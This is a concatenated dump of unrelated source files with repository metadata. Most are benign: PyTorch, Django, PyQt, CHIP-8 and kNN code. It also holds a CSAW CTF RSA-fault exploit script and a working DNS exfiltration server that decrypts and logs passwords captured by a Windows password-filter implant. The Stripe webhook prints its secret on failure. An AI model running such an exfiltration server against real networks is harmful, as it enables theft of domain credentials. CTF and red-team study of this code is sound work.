assert src.dim() == 3, 'Input (source) must be 3-dimensional [B x S x T]'
batch_size, nsent, ntokens = src.size()
device = src.device
sent_tokens = torch.ones(batch_size, nsent, 1).long() * self.unk_idx
sent_tokens = sent_tokens.to(device)
src = torch.cat([sent_tokens, src], dim=2)
if self.padding_idx is not None:
padding_mask = self.get_padding_mask(src)
src_emb = self.in_embed(src)
noq_out, q_out, clusters, distances = \
self.encoder.cluster(src_emb, padding_mask=padding_mask)
return noq_out, q_out, clusters, distances
def get_padding_mask(self, batch):
return batch == self.padding_idx
def get_tgt_inputs(self, batch):
batch_size, nsent, ntokens = batch.size()
bos = torch.ones(batch_size, nsent, 1).long().to(device) * self.bos_idx
return torch.cat([bos, batch], dim=2)
def generate_square_subsequent_mask(sz):
"""Generate a square mask for the sequence. The masked positions are filled with float('-inf').
Unmasked positions are filled with float(0.0).
"""
mask = (torch.triu(torch.ones(sz, sz)) == 1).transpose(0, 1)
mask = mask.float().masked_fill(mask == 0, float('-inf')).masked_fill(mask == 1, float(0.0))
return mask
| [
"stangelid@gmail.com"
] | stangelid@gmail.com |
ec2677dd7b4db844448b927264567f35f884aff1 | 89bfa644209978bd36e41cc3e89278f7f48ef6ad | /checkout/webhooks.py | 02ed2bb7bd730d7989438e590158462583081d0a | [] | no_license | Code-Institute-Submissions/usupplement | 472f9ff9e324c6c003b7a39dad67f115cc461901 | 07641acd48d4505e18bf32d306149429068659f3 | refs/heads/master | 2023-01-04T05:49:58.887080 | 2020-10-31T09:31:21 | 2020-10-31T09:31:21 | null | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 1,945 | py | from django.conf import settings
from django.http import HttpResponse
from django.views.decorators.http import require_POST
from django.views.decorators.csrf import csrf_exempt
from checkout.webhook_handler import StripeWH_Handler
import stripe
# Code copied from stripe and Code Institute
@require_POST
@csrf_exempt
def webhook(request):
"""Listen for webhooks from Stripe"""
# Setup
wh_secret = settings.STRIPE_WH_SECRET
stripe.api_key = settings.STRIPE_SECRET_KEY
# Get the webhook data and verify its signature
payload = request.body
sig_header = request.META['HTTP_STRIPE_SIGNATURE']
event = None
try:
event = stripe.Webhook.construct_event(
payload, sig_header, wh_secret
)
except ValueError as e:
# Invalid payload
return HttpResponse(status=400)
except stripe.error.SignatureVerificationError as e:
# Invalid signature
print(wh_secret)
return HttpResponse(status=400)
except Exception as e:
return HttpResponse(content=e, status=400)
# Code from Code Institute
# Set up a webhook handler
handler = StripeWH_Handler(request)
# and the values will be the actual methods inside the handler
event_map = {
'payment_intent.succeeded': handler.handle_payment_intent_succeeded,
'payment_intent.payment_failed': handler.handle_payment_intent_payment_failed,
}
# Get the webhook type from Stripe
event_type = event['type']
# Once we get the type we look it up in the key dictionary and assign it to a variable
# If there's a handler for it, get it from the event map
# Use the generic one by default
event_handler = event_map.get(event_type, handler.handle_event)
# envent_handler is just an alias for whatever function we pulled out of the dictionary
# Call the event handler with the event
response = event_handler(event)
return response
| [
"anders242@gmail.com"
] | anders242@gmail.com |
30a67b43ff15c63df374ecddfa271a40a3dfbe02 | d0c3335fa6979c5977981998a563627318bbf247 | /fault/sol.py | 3e2f14f3795b75005adbe348fb0e7685170b36cb | [] | no_license | incertia/csaw-quals-2019 | 83e5906f6cb80d2c88d2078c7e66d83a19d4bb90 | a68f652efa4cd444ea152e679b73422223a77874 | refs/heads/master | 2020-07-27T06:33:29.494246 | 2019-09-16T21:43:05 | 2019-09-16T21:43:05 | 208,903,459 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 1,113 | py | #! /usr/bin/env python2
from fault import *
from pwn import *
from gmpy2 import *
from Crypto.Util.number import GCD
import time
def menu(r):
for _ in xrange(8):
r.recvline()
#r = remote("localhost", 23333)
r = remote("crypto.chal.csaw.io", 1001)
R = RSA()
e = 0x10001
menu(r)
r.sendline('3')
c1 = int(r.recvline().strip(), 16)
# get N, or rather, a multiple of it
menu(r)
r.sendline('4')
r.recvuntil("input the data:")
r.sendline("\x02")
x1 = int(r.recvline().strip(), 16)
r.sendline('4')
r.recvuntil("input the data:")
r.sendline("\x03")
x2 = int(r.recvline().strip(), 16)
N = GCD(pow(s2n("\x02"), e) - x1, pow(s2n("\x03"), e) - x2)
y = 0
p = 0
q = 0
while True:
fake_flag = 'fake_flag{%s}' % (('%X' % y).rjust(32, '0'))
menu(r)
r.sendline('4')
r.recvuntil("input the data:")
r.sendline(fake_flag)
c2 = int(r.recvline().strip(), 16)
g = GCD(c1 - c2, N)
if g != 1:
assert is_prime(g)
p = g
q = N // p
R.generate(p, q)
break
y += 1
menu(r)
r.sendline('1')
c = int(r.recvline().strip(), 16)
print(n2s(R.decrypt(c)))
| [
"incertia@incertia.net"
] | incertia@incertia.net |
5721b85535ca393d3618d0287f79207cb73bf3d3 | 3b2a766682caa36a38ef7f85b9915096b0f47278 | /uiview/ui_updateCustomer.py | 2efe227e8971c350d7f61065429ab3e152aaec8d | [] | no_license | himalsaman/kmfmaintenance | 0d8252faaf749620628493a876cd759c3a6b8ed4 | 26d153bfa90b97da9f378d50a025f2660646435f | refs/heads/master | 2020-12-24T12:04:48.875927 | 2016-12-20T07:41:59 | 2016-12-20T07:41:59 | 73,080,044 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 15,785 | py | # -*- coding: utf-8 -*-
# Form implementation generated from reading ui file 'ui_updateCustomer.ui'
#
# Created by: PyQt5 UI code generator 5.6
#
# WARNING! All changes made in this file will be lost!
import sys
from PyQt5 import QtCore, QtGui, QtWidgets
from PyQt5.QtGui import QIntValidator
from PyQt5.QtWidgets import QDialog
from Control.userControl import getLoginDataPKL
from models import cityModel
from models.cityModel import select_city_by_id
from models.customersModel import select_customer_by_mob_num, update_customer
class Ui_updateCustomer(QDialog):
def __init__(self, parent=None):
super(Ui_updateCustomer, self).__init__()
self.setupUi(self)
def setupUi(self, updateCustomer):
self.setWindowFlags(self.windowFlags() & ~QtCore.Qt.WindowCloseButtonHint)
updateCustomer.setObjectName("updateCustomer")
updateCustomer.resize(683, 390)
self.label = QtWidgets.QLabel(updateCustomer)
self.label.setGeometry(QtCore.QRect(10, 10, 47, 16))
self.label.setObjectName("label")
self.loggeduserlbl = QtWidgets.QLabel(updateCustomer)
self.loggeduserlbl.setGeometry(QtCore.QRect(60, 10, 191, 16))
font = QtGui.QFont()
font.setBold(True)
font.setWeight(75)
self.loggeduserlbl.setFont(font)
self.loggeduserlbl.setText("")
self.loggeduserlbl.setObjectName("loggeduserlbl")
self.loggeduserlbl.setText(getLoginDataPKL()['name'])
self.line = QtWidgets.QFrame(updateCustomer)
self.line.setGeometry(QtCore.QRect(5, 27, 671, 16))
self.line.setFrameShape(QtWidgets.QFrame.HLine)
self.line.setFrameShadow(QtWidgets.QFrame.Sunken)
self.line.setObjectName("line")
self.custnameled = QtWidgets.QLineEdit(updateCustomer)
self.custnameled.setGeometry(QtCore.QRect(404, 44, 261, 20))
self.custnameled.setObjectName("custnameled")
self.mobcustled = QtWidgets.QLineEdit(updateCustomer)
self.mobcustled.setGeometry(QtCore.QRect(404, 70, 191, 20))
self.mobcustled.setObjectName("mobcustled")
self.mobcustled91 = QtWidgets.QLineEdit(updateCustomer)
self.mobcustled91.setGeometry(QtCore.QRect(404, 100, 191, 20))
self.mobcustled91.setObjectName("mobcustled91")
self.mobcustled92 = QtWidgets.QLineEdit(updateCustomer)
self.mobcustled92.setGeometry(QtCore.QRect(404, 130, 191, 20))
self.mobcustled92.setObjectName("mobcustled92")
self.mobcustled93 = QtWidgets.QLineEdit(updateCustomer)
self.mobcustled93.setGeometry(QtCore.QRect(404, 160, 191, 20))
self.mobcustled93.setObjectName("mobcustled93")
self.mobcustled94 = QtWidgets.QLineEdit(updateCustomer)
self.mobcustled94.setGeometry(QtCore.QRect(404, 190, 191, 20))
self.mobcustled94.setObjectName("mobcustled94")
self.citycmbx = QtWidgets.QComboBox(updateCustomer)
self.citycmbx.setGeometry(QtCore.QRect(401, 220, 171, 22))
self.citycmbx.setObjectName("citycmbx")
self.citycmbx.addItem("", 0)
for city in cityModel.select_all_cities():
self.citycmbx.addItem(city.name, city.id)
self.agespin = QtWidgets.QSpinBox(updateCustomer)
self.agespin.setGeometry(QtCore.QRect(404, 250, 81, 22))
self.agespin.setObjectName("agespin")
self.groupBox = QtWidgets.QGroupBox(updateCustomer)
self.groupBox.setGeometry(QtCore.QRect(404, 280, 191, 41))
self.groupBox.setTitle("")
self.groupBox.setObjectName("groupBox")
self.horizontalLayoutWidget = QtWidgets.QWidget(self.groupBox)
self.horizontalLayoutWidget.setGeometry(QtCore.QRect(5, 2, 181, 31))
self.horizontalLayoutWidget.setObjectName("horizontalLayoutWidget")
self.horizontalLayout = QtWidgets.QHBoxLayout(self.horizontalLayoutWidget)
self.horizontalLayout.setContentsMargins(0, 0, 0, 0)
self.horizontalLayout.setObjectName("horizontalLayout")
self.malebtn = QtWidgets.QRadioButton(self.horizontalLayoutWidget)
self.malebtn.setObjectName("malebtn")
self.horizontalLayout.addWidget(self.malebtn)
self.femalerbtn = QtWidgets.QRadioButton(self.horizontalLayoutWidget)
self.femalerbtn.setObjectName("femalerbtn")
self.horizontalLayout.addWidget(self.femalerbtn)
self.updatebtn = QtWidgets.QPushButton(updateCustomer)
self.updatebtn.setGeometry(QtCore.QRect(435, 350, 75, 31))
self.updatebtn.setObjectName("updatebtn")
self.updatebtn.clicked.connect(self.updateCustomer)
self.cancelbtn = QtWidgets.QPushButton(updateCustomer)
self.cancelbtn.setGeometry(QtCore.QRect(555, 350, 75, 31))
self.cancelbtn.setObjectName("cancelbtn")
self.cancelbtn.clicked.connect(self.close)
self.statuslbl = QtWidgets.QLabel(updateCustomer)
self.statuslbl.setGeometry(QtCore.QRect(10, 345, 331, 31))
self.statuslbl.setStyleSheet("color: rgb(255, 0, 0);")
self.statuslbl.setText("")
self.statuslbl.setAlignment(QtCore.Qt.AlignCenter)
self.statuslbl.setObjectName("statuslbl")
self.layoutWidget = QtWidgets.QWidget(updateCustomer)
self.layoutWidget.setGeometry(QtCore.QRect(350, 38, 51, 265))
self.layoutWidget.setObjectName("layoutWidget")
self.verticalLayout = QtWidgets.QVBoxLayout(self.layoutWidget)
self.verticalLayout.setContentsMargins(0, 0, 0, 0)
self.verticalLayout.setObjectName("verticalLayout")
self.label_3 = QtWidgets.QLabel(self.layoutWidget)
self.label_3.setObjectName("label_3")
self.verticalLayout.addWidget(self.label_3)
self.label_4 = QtWidgets.QLabel(self.layoutWidget)
self.label_4.setObjectName("label_4")
self.verticalLayout.addWidget(self.label_4)
self.label_41 = QtWidgets.QLabel(self.layoutWidget)
self.label_41.setObjectName("label_41")
self.verticalLayout.addWidget(self.label_41)
self.label_42 = QtWidgets.QLabel(self.layoutWidget)
self.label_42.setObjectName("label_42")
self.verticalLayout.addWidget(self.label_42)
self.label_43 = QtWidgets.QLabel(self.layoutWidget)
self.label_43.setObjectName("label_43")
self.verticalLayout.addWidget(self.label_43)
self.label_44 = QtWidgets.QLabel(self.layoutWidget)
self.label_44.setObjectName("label_44")
self.verticalLayout.addWidget(self.label_44)
self.label_7 = QtWidgets.QLabel(self.layoutWidget)
self.label_7.setObjectName("label_7")
self.verticalLayout.addWidget(self.label_7)
self.label_6 = QtWidgets.QLabel(self.layoutWidget)
self.label_6.setObjectName("label_6")
self.verticalLayout.addWidget(self.label_6)
self.label_5 = QtWidgets.QLabel(self.layoutWidget)
self.label_5.setObjectName("label_5")
self.verticalLayout.addWidget(self.label_5)
self.line_2 = QtWidgets.QFrame(updateCustomer)
self.line_2.setGeometry(QtCore.QRect(333, 40, 20, 340))
self.line_2.setFrameShape(QtWidgets.QFrame.VLine)
self.line_2.setFrameShadow(QtWidgets.QFrame.Sunken)
self.line_2.setObjectName("line_2")
self.layoutWidget_2 = QtWidgets.QWidget(updateCustomer)
self.layoutWidget_2.setGeometry(QtCore.QRect(10, 88, 70, 251))
self.layoutWidget_2.setObjectName("layoutWidget_2")
self.verticalLayout_2 = QtWidgets.QVBoxLayout(self.layoutWidget_2)
self.verticalLayout_2.setContentsMargins(0, 0, 0, 0)
self.verticalLayout_2.setObjectName("verticalLayout_2")
self.label_8 = QtWidgets.QLabel(self.layoutWidget_2)
self.label_8.setObjectName("label_8")
self.verticalLayout_2.addWidget(self.label_8)
self.label_9 = QtWidgets.QLabel(self.layoutWidget_2)
self.label_9.setObjectName("label_9")
self.verticalLayout_2.addWidget(self.label_9)
self.label_91 = QtWidgets.QLabel(self.layoutWidget_2)
self.label_91.setObjectName("label_91")
self.verticalLayout_2.addWidget(self.label_91)
self.label_92 = QtWidgets.QLabel(self.layoutWidget_2)
self.label_92.setObjectName("label_92")
self.verticalLayout_2.addWidget(self.label_92)
self.label_93 = QtWidgets.QLabel(self.layoutWidget_2)
self.label_93.setObjectName("label_93")
self.verticalLayout_2.addWidget(self.label_93)
self.label_94 = QtWidgets.QLabel(self.layoutWidget_2)
self.label_94.setObjectName("label_94")
self.verticalLayout_2.addWidget(self.label_94)
self.label_10 = QtWidgets.QLabel(self.layoutWidget_2)
self.label_10.setObjectName("label_10")
self.verticalLayout_2.addWidget(self.label_10)
self.label_11 = QtWidgets.QLabel(self.layoutWidget_2)
self.label_11.setObjectName("label_11")
self.verticalLayout_2.addWidget(self.label_11)
self.label_12 = QtWidgets.QLabel(self.layoutWidget_2)
self.label_12.setObjectName("label_12")
self.verticalLayout_2.addWidget(self.label_12)
self.layoutWidget_3 = QtWidgets.QWidget(updateCustomer)
self.layoutWidget_3.setGeometry(QtCore.QRect(90, 88, 271, 251))
self.layoutWidget_3.setObjectName("layoutWidget_3")
self.layoutWidget_3.setStyleSheet("color: rgb(255, 0, 0);")
self.verticalLayout_3 = QtWidgets.QVBoxLayout(self.layoutWidget_3)
self.verticalLayout_3.setContentsMargins(0, 0, 0, 0)
self.verticalLayout_3.setObjectName("verticalLayout_3")
self.renamelbl = QtWidgets.QLabel(self.layoutWidget_3)
self.renamelbl.setText("")
self.renamelbl.setObjectName("renamelbl")
self.verticalLayout_3.addWidget(self.renamelbl)
self.remobilenumlbl = QtWidgets.QLabel(self.layoutWidget_3)
self.remobilenumlbl.setText("")
self.remobilenumlbl.setObjectName("remobilenumlbl")
self.verticalLayout_3.addWidget(self.remobilenumlbl)
self.remobilenumlbl91 = QtWidgets.QLabel(self.layoutWidget_3)
self.remobilenumlbl91.setText("")
self.remobilenumlbl91.setObjectName("remobilenumlbl91")
self.verticalLayout_3.addWidget(self.remobilenumlbl91)
self.remobilenumlbl92 = QtWidgets.QLabel(self.layoutWidget_3)
self.remobilenumlbl92.setText("")
self.remobilenumlbl92.setObjectName("remobilenumlbl92")
self.verticalLayout_3.addWidget(self.remobilenumlbl92)
self.remobilenumlbl93 = QtWidgets.QLabel(self.layoutWidget_3)
self.remobilenumlbl93.setText("")
self.remobilenumlbl93.setObjectName("remobilenumlbl93")
self.verticalLayout_3.addWidget(self.remobilenumlbl93)
self.remobilenumlbl94 = QtWidgets.QLabel(self.layoutWidget_3)
self.remobilenumlbl94.setText("")
self.remobilenumlbl94.setObjectName("remobilenumlbl94")
self.verticalLayout_3.addWidget(self.remobilenumlbl94)
self.recitylbl = QtWidgets.QLabel(self.layoutWidget_3)
self.recitylbl.setText("")
self.recitylbl.setObjectName("recitylbl")
self.verticalLayout_3.addWidget(self.recitylbl)
self.reagelbl = QtWidgets.QLabel(self.layoutWidget_3)
self.reagelbl.setText("")
self.reagelbl.setObjectName("reagelbl")
self.verticalLayout_3.addWidget(self.reagelbl)
self.regenderlbl = QtWidgets.QLabel(self.layoutWidget_3)
self.regenderlbl.setText("")
self.regenderlbl.setObjectName("regenderlbl")
self.verticalLayout_3.addWidget(self.regenderlbl)
self.searchButton = QtWidgets.QPushButton(updateCustomer)
self.searchButton.setGeometry(QtCore.QRect(272, 45, 61, 31))
self.searchButton.setObjectName("searchButton")
self.mobcustled.setValidator(QIntValidator())
self.searchButton.clicked.connect(self.searchCustomer)
self.searchled = QtWidgets.QLineEdit(updateCustomer)
self.searchled.setGeometry(QtCore.QRect(74, 51, 191, 20))
self.searchled.setObjectName("searchled")
self.label_2 = QtWidgets.QLabel(updateCustomer)
self.label_2.setGeometry(QtCore.QRect(20, 54, 47, 13))
self.label_2.setObjectName("label_2")
self.retranslateUi(updateCustomer)
QtCore.QMetaObject.connectSlotsByName(updateCustomer)
def retranslateUi(self, updateCustomer):
_translate = QtCore.QCoreApplication.translate
updateCustomer.setWindowTitle(_translate("updateCustomer", "Update Customer"))
self.label.setText(_translate("updateCustomer", "Welcome, "))
self.malebtn.setText(_translate("updateCustomer", "Male"))
self.femalerbtn.setText(_translate("updateCustomer", "Female"))
self.updatebtn.setText(_translate("updateCustomer", "Save"))
self.cancelbtn.setText(_translate("updateCustomer", "Cancel"))
self.label_3.setText(_translate("updateCustomer", "Name:"))
self.label_4.setText(_translate("updateCustomer", "Mobile # :"))
self.label_41.setText(_translate("updateCustomer", "Mobile 1 # :"))
self.label_42.setText(_translate("updateCustomer", "Mobile 2 # :"))
self.label_43.setText(_translate("updateCustomer", "Mobile 3 # :"))
self.label_44.setText(_translate("updateCustomer", "Mobile 4 # :"))
self.label_7.setText(_translate("updateCustomer", "City :"))
self.label_6.setText(_translate("updateCustomer", "Age :"))
self.label_5.setText(_translate("updateCustomer", "Gender :"))
self.label_8.setText(_translate("updateCustomer", "Name:"))
self.label_9.setText(_translate("updateCustomer", "M. Mobile # :"))
self.label_91.setText(_translate("updateCustomer", "M. Mobile 1 # :"))
self.label_92.setText(_translate("updateCustomer", "M. Mobile 2 # :"))
self.label_93.setText(_translate("updateCustomer", "M. Mobile 3 # :"))
self.label_94.setText(_translate("updateCustomer", "M. Mobile 4 # :"))
self.label_10.setText(_translate("updateCustomer", "City :"))
self.label_11.setText(_translate("updateCustomer", "Age :"))
self.label_12.setText(_translate("updateCustomer", "Gender :"))
self.searchButton.setText(_translate("updateCustomer", "Search"))
self.label_2.setText(_translate("updateCustomer", "Mobile #"))
def searchCustomer(self):
mob_num = self.searchled.text()
if mob_num == '':
self.statuslbl.setText('Must enter mobilephone to start search')
elif select_customer_by_mob_num(mob_num):
selectedCust = select_customer_by_mob_num(mob_num)
self.renamelbl.setText(selectedCust.name)
self.custnameled.setText(selectedCust.name)
self.remobilenumlbl.setText(selectedCust.mobile_number)
self.remobilenumlbl91.setText(selectedCust.mobile_number_1)
self.remobilenumlbl92.setText(selectedCust.mobile_number_2)
self.remobilenumlbl93.setText(selectedCust.mobile_number_3)
self.remobilenumlbl94.setText(selectedCust.mobile_number_4)
self.mobcustled.setText(selectedCust.mobile_number)
self.mobcustled91.setText(selectedCust.mobile_number_1)
self.mobcustled92.setText(selectedCust.mobile_number_2)
self.mobcustled93.setText(selectedCust.mobile_number_3)
self.mobcustled94.setText(selectedCust.mobile_number_4)
city = select_city_by_id(selectedCust.city_id)
self.recitylbl.setText(city.name)
self.citycmbx.setCurrentText(city.name)
self.reagelbl.setText(str(selectedCust.age))
self.agespin.setValue(selectedCust.age)
self.regenderlbl.setText(selectedCust.gender.capitalize())
if selectedCust.gender == 'male':
self.malebtn.setChecked(True)
else:
self.femalerbtn.setChecked(True)
self.statuslbl.setText('')
else:
self.statuslbl.setText("Can't found customer")
def updateCustomer(self):
if select_customer_by_mob_num(self.searchled.text()) and self.mobcustled.text() != '' or \
self.remobilenumlbl.text() != '':
selectedCust = select_customer_by_mob_num(self.searchled.text())
custname = self.custnameled.text()
custmobnum = self.mobcustled.text()
custmobnum1 = self.mobcustled91.text()
custmobnum2 = self.mobcustled92.text()
custmobnum3 = self.mobcustled93.text()
custmobnum4 = self.mobcustled94.text()
custcity_id = self.citycmbx.currentIndex()
custage = self.agespin.text()
if self.malebtn.isChecked():
gndr = 'male'
elif self.femalerbtn.isChecked():
gndr = 'female'
if custname:
custname = self.renamelbl.text()
if not custmobnum:
custmobnum = self.remobilenumlbl.text()
if self.citycmbx.currentIndex() == 0:
custcity_id = selectedCust.city_id
if self.agespin.value() == 0:
custage = self.reagelbl.text()
if not self.malebtn.isChecked() | self.femalerbtn.isChecked():
gndr = self.regenderlbl.text()
update_customer(selectedCust.id, custname, custmobnum, custmobnum1, custmobnum2, custmobnum3,
custmobnum4, gndr, custage, custcity_id)
self.close()
else:
self.statuslbl.setText("No Customer To Update")
# if __name__ == "__main__":
# app = QtWidgets.QApplication(sys.argv)
# myapp = Ui_updateCustomer()
# myapp.show()
# app.exec_()
| [
"himalsaman@gmail.com"
] | himalsaman@gmail.com |
3869e363dfb5a60c769b43bd5937dc6ddec3b944 | ee78740ee10a5bd1089854dd49c81e0bec02b406 | /scripts/dns.py | dd615f9c04aa2fecc611ea073ca9eacaa1d5d98a | [
"MIT"
] | permissive | fengjixuchui/DLLPasswordFilterImplant | 09096aaf599a70fb0c4666c162c2bd26231d70fe | 1ed6b088163a8e7752f71512b655a172b5f75972 | refs/heads/master | 2021-02-09T22:06:17.614418 | 2020-02-24T18:15:18 | 2020-02-24T18:15:18 | null | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 4,686 | py | #!/usr/bin/env python
# -*- coding: utf-8 -*-
from __future__ import print_function
import re
from math import ceil
import time
from dnslib import RR,QTYPE,RCODE,TXT,parse_time
from dnslib.label import DNSLabel
from dnslib.server import DNSServer,DNSHandler,BaseResolver,DNSLogger
from Crypto.PublicKey import RSA
from Crypto.Cipher import PKCS1_OAEP
SYNTAX = re.compile(r'(\d+)\.([a-fA-F0-9]+)\..*')
MAX_LABEL_SIZE = 62 # Should match define in passwordFilter.c
class ExfilResolver(BaseResolver):
"""
A DNS resolver that always replies with an empty record, but keeps track of
encrypted chunks and dumps decrypted blocks.
The chunks are formatted according to the `SYNTAX` regular expression, that is:
<index>.<data>.domain.name.tld
For example, `01.85437de3829bc[...]432f.dns.evil.com`
The server will compupte the expected number of chunks based on the private
key length automatically.
Currently, the server does not support concurrent requests, in the off chance that
two password changes occur simultaneously. This could be implemented in two ways:
1. Cluster chunks by time intervals. This can still fail if two resets
happen in very close succession.
2. Add an additional label on the domain that contains a block
identifier. This requires changing the implant code and updating the
Empire module.
FIXME: Group by time proximity to avoid interleaving?
FIXME: Edge case: Simultaneous exfiltrations will lead to interleaved blocks
"""
def __init__(self,ttl,outfile, key):
self.ttl = parse_time(ttl)
self.out = outfile
self.key = key
self.chunk_num = ceil(key.size_in_bytes() / (MAX_LABEL_SIZE/2.0))
# Keep track of requests
self.chunks = {}
def decrypt(self, block):
rsa = PKCS1_OAEP.new(self.key)
return rsa.decrypt(block).strip().replace('\x00', '')
def resolve(self,request,handler):
reply = request.reply()
qname = request.q.qname
# Format is 00.DATA.domain.tld'
qstr = str(qname)
label = qstr.split('.')
if SYNTAX.match(qstr):
chunk_id = int(label[0])
chunk_data = label[1]
if chunk_id not in self.chunks: self.chunks[chunk_id] = chunk_data
# Decrypt and dump the chunk
if len(self.chunks) == self.chunk_num:
block = "".join([ self.chunks[i] for i in sorted(self.chunks.keys())]).decode('hex')
plain = self.decrypt(block)
try:
print('[+] %s: Credentials logged for user %s' % (time.ctime(), plain.split(':')[0]))
with open(self.out, 'ab') as o:
o.write('[%s] %s\n' % (time.ctime(), plain))
except:
pass
self.chunks.clear()
reply.add_answer(RR(qname,QTYPE.TXT,ttl=self.ttl, rdata=TXT("x00x00x00x00x00")))
return reply
if __name__ == '__main__':
import argparse,sys,time
p = argparse.ArgumentParser(description="A simple receive-only DNS server for exfiltration")
p.add_argument("--ttl","-t",default="60s", metavar="<ttl>", help="Response TTL (default: 60s)")
p.add_argument("--port","-p",type=int,default=53, metavar="<port>", help="Server port (default:53)")
p.add_argument("--address","-a",default="", metavar="<address>", help="Listen address (default:all)")
p.add_argument("--output", "-o",required=False, default="creds.txt", help="Filename to output credentials to (default: creds.txt)")
p.add_argument("--key", "-k",required=True, default="key.pem", help="Path to the private key for decryption")
args = p.parse_args()
print('[+] dns.py Started: %s' % (time.ctime()))
# Load private key
print('[+] Loading private key...')
with open(args.key, 'rb') as k:
raw = k.read()
try:
key = RSA.import_key(raw)
except:
# Maybe with a passphrase?
try:
import getpass
p = getpass.getpass()
key = RSA.import_key(raw, passphrase=p.strip())
except Exception as e:
print('[!] Could not read private key: ' + str(e))
sys.exit(1)
resolver = ExfilResolver(args.ttl, args.output, key)
# logger = DNSLogger("request,reply,truncated,error",False)
logger = DNSLogger("error",False)
udp_server = DNSServer(resolver, port=args.port, address=args.address, logger=logger)
udp_server.start_thread()
print('[+] DNS Server started')
while udp_server.isAlive(): time.sleep(1)
| [
"alex@segfault.me"
] | alex@segfault.me |
bc36940548e88e24a1d05ec6229b731d51e36a2b | 4c585dacfe152f43c94ee48c10ef8a487201c9a1 | /blog/views.py | 8023b406db422721f7b351be225c3b3bfecf19d5 | [] | no_license | t-katsuki/my-first-blog | 2344f9d52bff707acd6b45b0c0c4997fbf6d0a8e | 075633413499e05c9ed1a695da041770ca046e5c | refs/heads/master | 2023-02-07T13:06:43.129895 | 2020-12-31T06:36:10 | 2020-12-31T06:36:10 | 301,278,782 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 1,486 | py | from django.shortcuts import render, get_object_or_404
from django.utils import timezone
from .models import Post
from .forms import PostForm
from django.shortcuts import redirect
# Create your views here.
def post_list(request):
posts = Post.objects.filter(published_date__lte=timezone.now()).order_by('published_date')
return render(request, 'blog/post_list.html', {'posts': posts})
def post_detail(request, pk):
post = get_object_or_404(Post, pk=pk)
return render(request, 'blog/post_detail.html', {'post': post})
def post_new(request):
if request.method == "POST":
form = PostForm(request.POST)
if form.is_valid():
post = form.save(commit=False)
post.author = request.user
post.published_date = timezone.now()
post.save()
return redirect('post_detail', pk=post.pk)
else:
form = PostForm()
return render(request, 'blog/post_edit.html', {'form':form})
def post_edit(request, pk):
post = get_object_or_404(Post, pk=pk)
if request.method == "POST":
form = PostForm(request.POST, instance=post)
if form.is_valid():
post = form.save(commit=False)
post.author = request.user
post.published_date = timezone.now()
post.save()
return redirect('post_detail', pk=post.pk)
else:
form = PostForm(instance=post)
return render(request, 'blog/post_edit.html', {'form': form}) | [
"t.katsuki@hotmail.co.jp"
] | t.katsuki@hotmail.co.jp |
65a0a21d4115a39b32a812e6d421e15f132027a2 | 06232badd86105e053317eb272771eb7767c10ae | /chip8/testprograms/SNEVxByte/maketest.py | 4315c25628565d7b9b8cca39fa0cea43a7ab8c3e | [
"MIT"
] | permissive | MaxStrange/mychip8 | 010f242c515e89baa89540b8611ae62f7e943824 | f81dd44bf6d77a71e2f65d5eb1fdac9b7fec8593 | refs/heads/master | 2020-04-11T19:25:58.266701 | 2019-02-21T00:39:24 | 2019-02-21T00:39:24 | 162,033,486 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 644 | py | nop = b'\x00\x00'
brk = b'\x00\xA0'
ld = b'\x63\x25' # Load 0x25 into register V3
se = b'\x43\x23' # Skip next instruction if V3 != 0x23
with open("snevxbytetest.bin", 'wb') as f:
f.write(ld) # 0x0200 <-- Load the byte 0x25 into register V3
f.write(se) # 0x0202 <-- Compare V3 against byte 0x23
f.write(brk) # 0x0204 <-- If it worked, we should skip this instruction, otherwise we will break here
f.write(nop) # 0x0206 <-- If it worked, we should go here. NOP a few times, then break...
f.write(nop) # 0x0208
f.write(nop) # 0x020A
f.write(brk) # 0x020C <-- ...here
f.write(nop) # 0x020E
| [
"max.strange@synapse.com"
] | max.strange@synapse.com |
0f031e97fde4e6a473911818f72df966f6d07f8b | 8d0406ab213142fd9fa66330ed3ac5ec7b123444 | /Machine-Learning/in-action/kNN/kNN.py | d609dc91293c02e09736851b10c3ceb0712db33d | [] | no_license | NSGUF/PythonLeaning | da32929bef452a1d32f6c26732ad7801d8c93cbc | 7ce6bfbd1e57417377027cae8886f7953bec2848 | refs/heads/master | 2021-01-19T16:37:11.839347 | 2018-06-25T01:40:30 | 2018-06-25T01:40:30 | 101,011,546 | 3 | 0 | null | null | null | null | UTF-8 | Python | false | false | 4,411 | py | # -*- coding: utf-8 -*-
"""
@Created on 2018/5/28 11:16
@author: ZhifengFang
"""
import numpy as np
import operator
import os
def createDateSet():
group = np.array([[1.0, 1.1], [1.0, 1.0], [0, 0], [0, 0.1]])
labels = ['A', 'A', 'B', 'B']
return group, labels
# k-近邻算法
def classify0(inX, dataSet, labels, k): # inX:被预测的新数据点;dataSet:数据集;labels:对应的标签;
dataSetCol = dataSet.shape[0] # 获取数据集的行数
inXMat = np.tile(inX, (dataSetCol, 1)) - dataSet # 将输入值复制成数据集的行数并减去数据集,这样可得到被预测数据点与数据集中每个数据的差
inXMat = inXMat ** 2 # 平方
inXMat = inXMat.sum(axis=1) # 按行求和
inXMat = inXMat ** 0.5 # 开根号
sortedIndic = inXMat.argsort() # 排序的索引
classCount = {}
for i in range(k):
klabels = labels[sortedIndic[i]] # 前k个数的标签
classCount[klabels] = classCount.get(klabels, 0) + 1 # 计算每个标签的个数
sortedClassCount = sorted(classCount.items(), key=lambda x: x[1], reverse=True) # 按照字典的第一个数排序
return sortedClassCount[0][0]
# dataSet, labels = createDateSet()
# print(classify0([0, 0], dataSet, labels, 3))
# 读取文件并将内容分别存入数组和列表中
def filetomatrix(filename):
f = open(filename)
lines = f.readlines()
matcol = len(lines)
mat = np.empty(shape=(matcol, 3))
classLabels = []
for i, line in zip(range(matcol), lines):
line = line.strip().split('\t') # 去除空格,并按照\t分割
mat[i, :] = line[:3]
classLabels.append(int(line[-1]))
return mat, classLabels
# mat, classLabels = filetomatrix('datingTestSet2.txt')
# 归一化处理,公式为:(x-min_x)/(max_x-min_x)
def autoNorm(dataSet):
minVals = dataSet.min(0)
maxVals = dataSet.max(0)
ranges = maxVals - minVals
normDataSet = np.empty(shape=np.shape(dataSet))
m = dataSet.shape[0]
